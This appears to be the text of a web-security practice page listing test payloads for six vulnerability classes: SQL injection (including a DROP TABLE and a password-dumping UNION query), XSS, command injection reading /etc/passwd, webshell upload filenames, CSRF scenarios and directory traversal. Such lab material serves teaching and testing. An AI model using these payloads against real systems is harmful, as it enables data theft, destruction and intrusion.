💉 SQL Injection
HIGH RISK
💡 Try these payloads:
1' OR '1'='1
1; DROP TABLE users;--
1' UNION SELECT password FROM admin--
Ready to test SQL injection...
🚨 Cross-Site Scripting (XSS)
HIGH RISK
💡 Try these payloads:
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
Ready to test XSS...
⚡ Command Injection
HIGH RISK
💡 Try these payloads:
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | ls -la
Ready to test command injection...
📁 File Upload Vulnerability
MEDIUM RISK
💡 Try these filenames:
shell.php
backdoor.asp
../../../etc/passwd
Ready to test file upload...
🔄 Cross-Site Request Forgery
MEDIUM RISK
💡 CSRF Attack Scenarios:
Hidden form auto-submit
Malicious image src attribute
AJAX request from malicious site
Ready to test CSRF...
📂 Directory Traversal
MEDIUM RISK
💡 Try these paths:
../../../etc/passwd
..\\..\\..\\windows\\system32\\drivers\\etc\\hosts
....//....//....//etc//passwd
Ready to test directory traversal...